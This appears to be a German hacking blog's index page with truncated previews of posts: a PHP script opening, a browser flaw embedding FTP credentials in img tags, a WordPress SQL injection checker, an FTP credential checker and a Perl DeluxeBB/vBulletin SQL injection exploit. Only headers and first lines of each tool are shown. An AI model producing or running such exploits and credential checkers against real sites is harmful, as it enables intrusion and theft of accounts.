[php] <?php @error_reporting(0); @set_magic_quotes_runtime(0); ob_start(); @mkdir(‚damane‘, 0755); $mtime = explode(‚ ‚, microtime()); $starttime = $mtime[1] + $mt... weiterlesen...
Die meisten gängigen Browser besitzen eine Sicherheitsschwachstelle die mir vor ein paar Tagen aufgefallen ist. Sie ermöglicht es FTP Url’s mittels des img tag’s einzubinden, ohn... weiterlesen...
[php]#!/usr/bin/python #WordPress SQL Injection Checker v1 #for md5’s in the source will use #http responses. # __ __ ___ ___ #___ __ \/ /______ __ \_____ / #__ | / /_ /_ ___/ / / / __... weiterlesen...
Script ftp://username : password@server [php] <?php #Coded By Burtay #Burtay #MegaTurks.Net #[email protected] set_time_limit(0); error_reporting(0); class ftp_checker { private $co... weiterlesen...
[php] #!/usr/bin/perl use IO::Socket; print q{ ###################################################### # DeluxeBB Remote SQL Injection Exploit # # vbulletin Remote SQL Injection Exploit # ###... weiterlesen...
Kommentare